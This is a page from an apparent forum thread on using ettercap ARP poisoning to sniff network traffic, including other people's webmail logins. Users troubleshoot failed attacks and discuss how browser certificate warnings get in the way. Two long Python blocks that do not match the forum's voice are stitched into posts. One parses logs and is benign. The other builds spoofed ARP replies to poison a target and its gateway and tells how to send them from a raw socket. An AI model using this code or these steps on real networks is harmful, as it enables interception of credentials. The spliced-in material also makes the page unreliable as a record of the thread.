Page 5 of 25 FirstFirst ... 3456715 ... LastLast
Results 41 to 50 of 248

Thread: Sniffing Tutorial:

  1. #41
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    7

    Problem with MITM

    Hi

    I've done all the procedures but I got some error messages within ettercap. I use BT 2.0 Beta on an MSI S270 laptop.

    Here is the output of ettercap

    Code:
    ARP poisoning victims:
    
     GROUP 1 : ANY (all the hosts in the list)
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.21.112
    DHCP: [00:40:D0:7A:FC:16] DISCOVER 
    DHCP: [00:40:D0:7A:FC:16] DISCOVER 
    DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.10.133
    DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    DHCP: [192.168.10.42] OFFER : 192.168.10.135 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.123 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.123 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    DHCP: [192.168.10.42] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.40] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.42] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.40] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    Unified sniffing was stopped.
    ARP poisoner deactivated.
    RE-ARPing the victims...
    I didn't get a new certificate on the victim's machine, btw.
    Victims, attacker and the router can all communicate with each other (they can ping each other).

    what is the problem?

    btw, I have too many problems with that f.king laptop
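
    The output pasted above is long and repetitive, and the useful facts in it (which DHCP servers answered, which destinations ettercap failed to forward to, and whether every failure carries the same libnet error) are easy to miss by eye. The following is an added example, not part of the post or of ettercap itself: a small Python triage script that parses ettercap's `DHCP:` and `SEND L3 ERROR:` lines and summarises them. The `SAMPLE` text is a shortened excerpt of the posted output; the regexes, the `triage`/`render` function names and the "uniform failure" heuristic are my own.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: a shortened excerpt of the ettercap output posted above.
# The bare ")" lines are the wrapped tail of each SEND L3 ERROR record.
SAMPLE = """\
Starting Unified sniffing...

DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.21.112
DHCP: [00:40:D0:7A:FC:16] DISCOVER
DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.10.133
DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
)
DHCP: [192.168.10.42] OFFER : 192.168.10.135 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
DHCP: [192.168.10.42] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
)
SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
)
Unified sniffing was stopped.
"""

# Line shapes as they appear in the posted output (my regexes, not ettercap's).
DHCP_RE = re.compile(r"^DHCP: \[([^\]]+)\] (DISCOVER|OFFER|REQUEST|ACK|NAK|RELEASE|INFORM)\b(.*)$")
LEASE_RE = re.compile(r":\s*(\S+) (\S+) GW (\S+) DNS (\S+)")
SEND_RE = re.compile(
    r"^SEND L3 ERROR: (\d+) byte packet \((\w+):(\w+)\) destined to (\S+) was not forwarded "
    r"\((\w+)\(\): (-?\d+) bytes written \(([^)]*)\)")


def triage(text):
    """Summarise one ettercap session log into plain counters."""
    rep = {
        "dhcp_msgs": Counter(),               # message type -> count
        "dhcp_servers": defaultdict(set),     # server IP -> {(offered ip, gw, dns)}
        "dhcp_clients": set(),                # client MACs that sent DISCOVER/REQUEST
        "unforwarded": defaultdict(Counter),  # destination IP -> {packet size: count}
        "send_errors": Counter(),             # (libnet function, errno text) -> count
    }
    for line in text.splitlines():
        m = DHCP_RE.match(line)
        if m:
            who, kind, rest = m.groups()
            rep["dhcp_msgs"][kind] += 1
            lease = LEASE_RE.search(rest)
            if kind in ("OFFER", "ACK") and lease:
                ip, _mask, gw, dns = lease.groups()
                rep["dhcp_servers"][who].add((ip, gw, dns))
            elif kind in ("DISCOVER", "REQUEST"):
                rep["dhcp_clients"].add(who)
            continue
        m = SEND_RE.match(line)
        if m:
            size, _ethertype, _proto, dst, func, _written, errtxt = m.groups()
            rep["unforwarded"][dst][int(size)] += 1
            rep["send_errors"][(func, errtxt)] += 1
    return rep


def forwarding_failed_uniformly(rep):
    """True when every unforwarded packet died in the same libnet call with the
    same errno regardless of destination: the thing to inspect is then the
    sending host's own send path, not any one victim or flow."""
    return len(rep["send_errors"]) == 1 and sum(rep["send_errors"].values()) > 0


def render(rep):
    out = [f"DHCP messages: {dict(rep['dhcp_msgs'])}",
           f"DHCP servers answering: {sorted(rep['dhcp_servers'])}",
           f"DHCP clients: {sorted(rep['dhcp_clients'])}"]
    for dst, sizes in sorted(rep["unforwarded"].items()):
        out.append(f"not forwarded -> {dst}: {sum(sizes.values())} packets, sizes {sorted(sizes)}")
    for (func, err), n in rep["send_errors"].items():
        out.append(f"{func}() failed {n}x with '{err}'")
    return "\n".join(out)


if __name__ == "__main__":
    print(render(triage(SAMPLE)))
```

    Run it against a full saved session (`ettercap ... | tee session.log`, then feed the file to `triage`) and the report tells you at a glance that two hosts answered DHCP on this network and that every single L3 write failed with the same `Operation not permitted`, which is the kind of fact worth having in hand before asking for help.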

  2. #42
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    24


    Hi all
    I have a question: when I start sniffing with ettercap it doesn't show me what ettercap sniffs. For example, it should show me something like this:

    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.21.112
    DHCP: [00:40:D0:7A:FC:16] DISCOVER
    DHCP: [00:40:D0:7A:FC:16] DISCOVER
    DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.10.133
    DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40

    It only tells me that sniffing has started.
    I can see only this:
    ARP poisoning victims:

    GROUP 1 : 192.168.x.x

    GROUP 2 : 192.168.x.x
    Starting Unified sniffing...
    At this point I can't see anything else.

    Thanks to all who help me!
    bye

  3. #43
    Just burned his ISO
    Join Date
    Dec 2006
    Posts
    1


    I found that if you have the target IP in group 1 and group 2, it does not work. Just try it with group 1 only.

    Quote Originally Posted by L0g0ff
    I have a question: when I start sniffing with ettercap it doesn't show me what ettercap sniffs.

  4. #44
    Junior Member
    Join Date
    Nov 2006
    Posts
    26


    Anybody got this to work with a DWL-G122? ettercap crashes when I go to Sniff / Unified sniffing / rausb0:

    unknown physical layer type 0x322

  5. #45
    g4hsean
    Guest


    I was wondering, when I use ettercap to sniff Hotmail and Gmail, do all the computers trying to access Hotmail have to connect to that one computer running ettercap? Because I downloaded a program the other day that sniffs traffic, but all victim computers have to connect to the sniffing computer.

  6. #46
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    4

    okokokok

    I've read all 5 pages of this post and it seems like most of you are new to sniffing and spoofing. It's quite simple yet complex, I guess. I too was a noob; even with a wealth of knowledge I will always feel like a noob. There's always something you don't know.

    A sniffer sniffs traffic.
    A spoofer spoofs/tricks MAC identities (ARP).

    With a basic hub, you usually can sniff traffic without spoofing. The reasoning is that a hub doesn't know or care about who's connected. All a hub wants to do is move packets around ports. Very basic. Yes, this is a very dumbed-down version. So a hub can be sniffed without ARP spoofing/poisoning (mostly).

    A router or switch, on the other hand, is different. They have internal components that keep track of the physically connected devices. Not all switches do this, but almost all routers do. A router knows based on the packet's header that 192.168.1.100 is located at port 1; therefore it is added to the CAM table. Every packet that is destined for 192.168.1.100 will be sent to port 1 based on the CAM table, a.k.a. Content Addressable Memory. Please look this up, as it will unboggle your mind.

    That being said, now you can see that if you are 192.168.1.102 and you want to see a packet from 192.168.1.101, you cannot just sniff the network. You must in some way influence that packet to your physical port. Can you guess how we do that??? That's right, about 60,000 posts later and a proggy gets made. We will use arpspoof or ettercap to deform the ARP cache of your target, in this case 192.168.1.101. ARP works based on IP-MAC combos.

    IP:192.168.1.102 MAC: 00:11:22:33:44:55 US!
    IP:192.168.1.101 MAC: 00:11:22:33:44:66 THEM!
    IP:192.168.1.1 GATEWAY(Out to Internet)

    When 192.168.1.101 wants to send something to 192.168.1.105, it looks in its ARP table. If that IP-MAC combo is in the table then it will send the packet accordingly. If not, it will send an ARP request (who has 192.168.1.105?).

    So the theory of spoofing is that I need to tell 192.168.1.101 that I have address 192.168.1.105. So we beat the ARP packet to the punch. When you ARP spoof, you send TONS of ARP packets saying I AM 192.168.1.105 with MAC 00:11:22:33:44:55. As you can see, that MAC is OURS. Now 192.168.1.101's ARP table contains that combo. When 192.168.1.101 sends a packet to 192.168.1.105, the packet's header will contain OUR MAC. Therefore the router/switch will send it to whoever has that MAC.

    You're probably wondering why I put 192.168.1.1 as a gateway in the list. Well, I'll tell ya. If you're browsing the internet then your packets must go through the gateway. Now put 2 and 2 together. Spoof THEM as target 1 and GATEWAY as target 2. Now you'll see everything that is destined for the internet/not your local network. That's why there's a target 1 and a target 2. Doesn't matter about direction.

    Target 1's packets will have a spoofed MAC in the ARP table, as will target 2's. That spoofed MAC will be YOURS and you will be forwarding every packet after you make a copy first. Your box will be turned into a packet forwarder.


    Well, it's been fun and I forgot what you posted about ettercap/arpspoof. I hope this sums it up in a VERY basic and concise way. There is a lot more to it; it's up to you to research. Thank you for playing.
    Peace.

    P.S. I love BackTrack. Even though I have 3 posts, I've been using it for over a year. I miss the old site forum. Had more posts in there. So, thank you to Mutts and all. I will enjoy this distro for the years to come.
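
    The post above describes the mechanism in words: an unsolicited ARP reply that claims "I am 192.168.1.1" (or "I am 192.168.1.101") with OUR MAC, sent to target 1 and target 2, so that both ends' ARP tables point at the attacker. The following is an added example, not the poster's code and not arpspoof's or ettercap's: it builds that exact Ethernet/ARP frame byte for byte, parses it back, and replays it against a minimal model of a victim's ARP cache so the IP-MAC "combos" can be watched changing. The US/THEM/GATEWAY IPs and the two MACs are the post's; the gateway MAC, the `Host` cache model (accepts any unsolicited reply addressed to it, no static entries) and all function names are my assumptions. It does not transmit anything.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Addresses from the post. The gateway MAC is not given there; it is an
# assumed placeholder so the second target can be modelled.
US = ("192.168.1.102", "00:11:22:33:44:55")
THEM = ("192.168.1.101", "00:11:22:33:44:66")
GATEWAY = ("192.168.1.1", "00:11:22:33:44:01")


def mac_bytes(mac): return bytes(int(x, 16) for x in mac.split(":"))
def ip_bytes(ip): return bytes(int(x) for x in ip.split("."))
def fmt_mac(b): return ":".join(f"{x:02x}" for x in b)
def fmt_ip(b): return ".".join(str(x) for x in b)


def build_arp_reply(claimed_ip, claimed_mac, victim_ip, victim_mac):
    """Ethernet II frame carrying the ARP reply 'claimed_ip is-at claimed_mac',
    sent unicast to the victim. This is the 42-byte packet arpspoof/ettercap
    keep repeating; nothing in ARP lets the victim verify the claim."""
    eth = mac_bytes(victim_mac) + mac_bytes(claimed_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet, IPv4, 6/4-byte addresses
    arp += mac_bytes(claimed_mac) + ip_bytes(claimed_ip)       # sender hw/proto: the lie
    arp += mac_bytes(victim_mac) + ip_bytes(victim_ip)         # target hw/proto: who should believe it
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet+ARP frame; None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    b = frame[22:42]
    return {"op": op,
            "sender_mac": fmt_mac(b[0:6]), "sender_ip": fmt_ip(b[6:10]),
            "target_mac": fmt_mac(b[10:16]), "target_ip": fmt_ip(b[16:20])}


class Host:
    """Minimal ARP-cache model (assumption, not any particular OS): a reply
    addressed to this host overwrites the cache entry for the sender IP,
    whether or not a request was ever sent. That is what poisoning relies on."""
    def __init__(self, ip, mac, cache):
        self.ip, self.mac, self.cache = ip, mac, dict(cache)

    def receive(self, frame):
        arp = parse_arp(frame)
        if arp and arp["op"] == ARP_REPLY and arp["target_ip"] == self.ip:
            self.cache[arp["sender_ip"]] = arp["sender_mac"]

    def next_hop_mac(self, dst_ip):
        return self.cache.get(dst_ip)


def poison_both(us, target1, target2):
    """Target 1 is told 'target2 is-at us'; target 2 is told 'target1 is-at us'.
    After this, traffic in both directions is addressed to our MAC, and it is
    our job to forward it on (the 'packet forwarder' the post mentions)."""
    return [build_arp_reply(target2[0], us[1], target1[0], target1[1]),
            build_arp_reply(target1[0], us[1], target2[0], target2[1])]


def demo():
    """Return (before, after): the MAC THEM uses for the gateway and the MAC the
    gateway uses for THEM, before and after one round of poisoning."""
    them = Host(*THEM, cache={GATEWAY[0]: GATEWAY[1]})
    gw = Host(*GATEWAY, cache={THEM[0]: THEM[1]})
    before = (them.next_hop_mac(GATEWAY[0]), gw.next_hop_mac(THEM[0]))
    for frame in poison_both(US, THEM, GATEWAY):
        them.receive(frame)   # each host only honours the frame addressed to it
        gw.receive(frame)
    after = (them.next_hop_mac(GATEWAY[0]), gw.next_hop_mac(THEM[0]))
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("THEM->gateway MAC, gateway->THEM MAC")
    print("before:", before)
    print("after: ", after)
```

    To actually emit the frames on Linux you would write the bytes from `build_arp_reply` to an `AF_PACKET` raw socket bound to the interface, repeat every couple of seconds as the real tools do, and turn on IP forwarding on your box before starting, otherwise the two targets lose connectivity instead of being silently relayed. The `demo` output makes the post's point concrete: after poisoning, both ends resolve the other to `00:11:22:33:44:55`, which is US.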

  7. #47
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    12


    I am not sure what is going on. I have followed it to the tee. Now I have BT 2.0 final and ettercap is version 0.7.3. I go to unified sniffing, select eth1 (that is the interface connected to the wireless internet), then push Ctrl+S; it says randomizing 255 hosts for scanning, 1 hosts added to the hosts list. Then I select MITM / ARP poisoning, check sniff remote connections, click OK. Now it tells me ARP poisoning victims: GROUP 1 : Any GROUP 2 : Any. Then I select Start / Start sniffing; it then tells me it has started unified sniffing. When I go to Yahoo to log into my mail, my BT tells me nothing and I am able to log in with no security issue??

  8. #48
    Junior Member
    Join Date
    Mar 2007
    Posts
    26


    This may be a really dumb question but I need to ask for verification. When cracking WEP you don't have to be connected to the internet, but when sniffing I take it that you have to be connected to the internet, correct? (We all should be allowed one stupid question, lol.)

  9. #49
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    12


    Yes, you have to be connected to that access point in order to sniff the packets on the network. I wasn't sure either; then when I got nothing I tried to connect and it started to work, but I still have issues. Also, if the user uses Internet Explorer 7, IE will stop the page from loading and pretty much say they are being hacked. They do have the option to continue loading the site, but I never got mine to load when I clicked that option.

  10. #50
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15


    True, it kind of bugs the email sniffing function, because many people use IE7.

